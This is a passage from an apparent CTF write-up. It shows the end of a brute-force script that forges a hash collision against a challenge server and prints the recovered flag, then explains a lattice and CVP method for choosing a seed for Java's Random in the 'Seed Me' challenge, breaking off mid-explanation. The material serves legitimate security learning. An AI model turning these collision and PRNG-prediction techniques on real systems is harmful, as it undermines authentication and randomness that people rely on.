        assert GoodHash(token).hexdigest() == hexhash
        fake = find_collision(token)
        if fake:
            print(fake)
            print(json.loads(fake))
            io.sendline(fake)
            print(io.recvallS())
            break
        print("next")
        io.close()


main()

# run this script in 8 tmux windows, then sit down and pray one of them can find the correct one in a short time...
# pbctf{GHASH_is_short_for_GoodHash_:joy:}

This very brute-force random algorithm has a low success rate, but it's sufficient for obtaining the flag. For each token, I tried up to 2122^{12} times, and if it failed, I reconnected to get a new token. Running this script in 8 tmux panes simultaneously took about 5 minutes to get the flag.

Seed Me

import java.nio.file.Files;
import java.nio.file.Path;
import java.io.IOException;
import java.util.Random;
import java.util.Scanner;

class Main {

    private static void printFlag() {
        try {
            System.out.println(Files.readString(Path.of("flag.txt")));
        }
        catch(IOException e) {
            System.out.println("Flag file is missing, please contact admins");
        }
    }

    public static void main(String[] args) {
        int unlucky = 03777;
        int success = 0;
        int correct = 16;

        System.out.println("Welcome to the 'Lucky Crystal Game'!");
        System.out.println("Please provide a lucky seed:");
        Scanner scr = new Scanner(System.in);
        long seed = scr.nextLong();
        Random rng = new Random(seed);

        for(int i=0; i<correct; i++) {
            /* Throw away the unlucky numbers */
            for(int j=0; j<unlucky; j++) {
                rng.nextFloat();
            }

            /* Do you feel lucky? */
            if (rng.nextFloat() >= (7.331f*.1337f)) {
                success++;
            }
        }

        if (success == correct) {
            printFlag();
        }
        else {
            System.out.println("Unlucky!");
        }
    }
}

This problem requires finding a seed that makes Java 17's Random output exceed 7.331 * 0.1337 ~= 0.98 every 2047 times, repeated 16 times.

First, information about Java 17's Random can be found here. It is a simple LCG with the formula s = (s * 0x5DEECE66D + 0xb) % (2 ** 48). The nextFloat method is implemented as next(24) / ((float)(1 << 24)).

To achieve this goal, the state every 2047 times needs to be very close to m=248m=2^{48}.

Since this is an LCG, the 16 outputs can be written as:

v1a1s+b1(modm)v2a2s+b2(modm)v16a16s+b16(modm)\begin{aligned} v_1 &\equiv a_1 s + b_1 \pmod{m} \\ v_2 &\equiv a_2 s + b_2 \pmod{m} \\ &\vdots \\ v_{16} &\equiv a_{16} s + b_{16} \pmod{m} \end{aligned}

The goal is to make viv_i as close to mm as possible, meaning mvi>0m-v_i > 0 should be small, so vi<mv_i < m but very close to mm. Using this and rewriting the modulo part, we get:

a1sk1m=v1b1a2sk2m=v2b2a16sk16m=v16b16\begin{aligned} a_1 s - k_1 m &= v_1 - b_1 \\ a_2 s - k_2 m &= v_2 - b_2 \\ & \vdots\\ a_{16} s - k_{16} m &= v_{16} - b_{16} \end{aligned}

From here, we can write the Lattice Basis BB:

B=[1a1a2a16mmm]B= \begin{bmatrix} 1 & a_1 & a_2 & \cdots & a_{16} \\ & m \\ & & m \\ & & & \ddots \\ & & & & m \end{bmatrix}

Setting v=(s,k1,,k16)v=(s,-k_1,\cdots,-k_{16}), we have vB=(s,v1b1,,v16b16)vB=(s,v_1-b_1,\cdots,v_{16}-b_{16}).

I used Inequality Solving with CVP. You provide the upper and lower bounds for vBvB, and